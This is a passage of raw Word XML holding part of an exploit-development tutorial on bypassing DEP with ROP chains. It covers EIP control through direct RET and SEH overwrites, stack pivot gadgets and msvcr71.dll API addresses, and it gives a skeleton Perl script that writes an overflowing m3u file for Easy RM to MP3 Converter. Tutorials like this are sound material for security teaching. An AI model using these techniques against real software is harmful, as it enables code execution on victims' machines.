      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Example : msvcr71.dll on XP SP3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">7C37A08C : HeapCreate() </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">7C37A07C : HeapAlloc() </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">7C37A094 : VirtualAlloc() </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">7C37A140 : VirtualProtect() </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Quotations"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Note : check out "!pvefindaddr ropcall" , available in </w:t>
      </w:r>
      <w:hyperlink r:id="rId51">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
          </w:rPr>
          <w:t>pvefindaddr</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> v1.34 and up</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="eiptorop"/>
      <w:bookmarkEnd w:id="9"/>
      <w:r>
        <w:rPr/>
        <w:t>From EIP to ROP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>To make things clear, we’ll start with the basics.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Whether DEP is enabled or not, the initial process to overflow a buffer and eventually gain control over EIP will be exactly the same.  So you either end up with overwriting EIP directly, or you manage to overwrite a SEH record and trigger an access violation so the overwritten SE handler address is called.  (There are other ways to get control over EIP, but these are outside the scope of this article)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>So far so good, DEP has nothing to do with that.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="directret"/>
      <w:bookmarkEnd w:id="10"/>
      <w:r>
        <w:rPr/>
        <w:t>Direct RET</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>In a typical direct RET exploit, you directly overwrite EIP with an arbitrary value (or, to be more precise, EIP gets overwritten when a function epilogue – which uses an overwritten saved EIP – is triggered).  When that happens, you’ll most likely see that you control memory data in the location where ESP points at.  So if it wasn’t for DEP, you would locate a pointer to "jump esp" using your favorite tool (!pvefindaddr j esp) and jump to your shellcode. Game over.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>When DEP is enabled, we cannot do that.  Instead of jumping to ESP (overwriting EIP with a pointer that would jump to esp), we have to call the first ROP gadget (either directly in EIP or by making EIP return to ESP). The gadgets must be set up in a certain way so they would form a chain and one gadget returns to the next gadget without ever executing code directly from the stack.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>How this can allow us to build a ROP exploit will be discussed later on.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="sehbased"/>
      <w:bookmarkEnd w:id="11"/>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">SEH based </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>In a SEH based exploit, things are a bit different.  You only control the value in EIP when the overwritten SE Handler is called (by triggering an access violation for example).   In typical SEH based exploits, you will overwrite SEH with a pointer to pop/pop/ret, which will make you land at next SEH, and execute the instructions at that location.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>When DEP is enabled, we cannot do that.  We can call the p/p/r just fine, but when it lands back, it would start executing code from the stack. And we cannot execute code on the stack, remember ?  We have to build a ROP chain, and have that chain bypass/disable the execution prevention system first.  This chain will be placed on the stack (as part of your exploit payload)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>So in the case of a SEH based exploit, we have to find a way to return to our payload (on the stack in our case) instead of calling a pop pop ret sequence.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">The easiest way to do so, is by performing a so-called </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
        </w:rPr>
        <w:t>"stack pivot"</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> operation. Instead of using a pop pop ret, we’ll just try to get back to a location on the stack where our buffer resides.  You can do this by issuing one of the following instructions :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">add esp, offset + ret </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">mov esp, register + ret </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">xchg register,esp + ret </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">call register (if a register points to data you control) </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">mov reg,[ebp+0c] + call reg (or other references to seh record) </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">push reg + pop esp + ret (if you control ‘reg’) </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">mov reg, dword ptr fs:[0] + … + ret  (set esp indirectly, via SEH record) </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Again, how this can initiate our ROP chain, will be discussed below.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="beforewebegin"/>
      <w:bookmarkEnd w:id="12"/>
      <w:r>
        <w:rPr/>
        <w:t>Before we begin</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">In </w:t>
      </w:r>
      <w:hyperlink r:id="rId52">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
          </w:rPr>
          <w:t>Dino Dai Zovi</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr/>
        <w:t>‘s awesome paper on ROP, he has visualized the ROP exploit process components (page 39) very well. When building a ROP based exploit, you will need to</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Pivot to the stack </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Use your gadgets to set up stack/registers (ROP payload) </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Throw in your regular shellcode </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Get the shellcode to execute </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5172075" cy="1247775"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="9" name="Image9" descr="">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a:hlinkClick r:id="rId54"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId53"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5172075" cy="1247775"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>(image used with permission of Dino Zai Dovi)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>We will walk through all of these stages in the next chapters.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="ropversion"/>
      <w:bookmarkEnd w:id="13"/>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Direct RET – The ROP version – VirtualProtect() </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="ropnroll"/>
      <w:bookmarkEnd w:id="14"/>
      <w:r>
        <w:rPr/>
        <w:t>Time to ROP ‘n ROLL</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Let’s build our first ROP exploit.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>We will be using Windows XP SP3 Professional, English, with DEP in OptOut mode.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2295525" cy="1314450"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="10" name="Image10" descr="">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a:hlinkClick r:id="rId56"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId55"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2295525" cy="1314450"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">In this example, I will try to build a ROP based exploit for </w:t>
      </w:r>
      <w:hyperlink r:id="rId57" w:tgtFrame="_blank">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
          </w:rPr>
          <w:t>Easy RM to MP3 Converter</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">, the vulnerable application which was used earlier in </w:t>
      </w:r>
      <w:hyperlink r:id="rId58" w:tgtFrame="_blank">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
          </w:rPr>
          <w:t>tutorial 1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr/>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Quotations"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="283"/>
        <w:ind w:left="567" w:right="567" w:hanging="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Note : the offsets and addresses may be different on your system. Don’t just blindly copy everything from this tutorial, but try it yourself and adjust addresses where necessary.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Easy RM to MP3 Converter is vulnerable to a buffer overflow when opening a m3u file that contains an overly long string.  Using a cyclic pattern, we discover that EIP gets overwritten after 26094 bytes. Again, this is the offset on my system. If the offset is different, then change the script accordingly. The offset is based on the location where the m3u file is placed on your system, as the application will prepend your buffer with the full path to the file. You can calculate the offset with 20000 A’s + 7000 char Metasploit pattern).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Anyways, the skeleton exploit script (perl) will look something like this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 based exploit for Easy RM to MP3 Converter</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#written by corelanc0d3r - http:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="D7DF01"/>
        </w:rPr>
        <w:t>//www.corelan.be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$file= "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="7FEC7F"/>
        </w:rPr>
        <w:t>rop.m3u</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$buffersize = 26094;</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$junk = "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="7FEC7F"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>" x $buffersize;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$eip="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="7FEC7F"/>
        </w:rPr>
        <w:t>BBBB</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$rest = "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="7FEC7F"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>" x 1000;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$payload = $junk.$eip.$rest;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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="7FEC7F"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload size : </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>".length($payload)."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open($FILE,"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="7FEC7F"/>
        </w:rPr>
        <w:t>&gt;$file</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$FILE $payload;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close($FILE);</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print "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="7FEC7F"/>
        </w:rPr>
        <w:t>m3u File $file Created successfullyn</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>";</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>If our offset is correct, EIP should get overwritten with BBBB (42424242) …</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3867150" cy="1847850"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="11" name="Image11" descr="">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a:hlinkClick r:id="rId60"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId59"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3867150" cy="1847850"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">… </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>and ESP points at an address that contains our C’s.  So far so good, this is a typical direct RET overwrite exploit.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>If it wasn’t for DEP, we would place our shellcode at ESP (instead of the C’s) and overwrite EIP with a pointer to jmp esp. But we cannot do that because the shellcode won’t get executed due to DEP.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
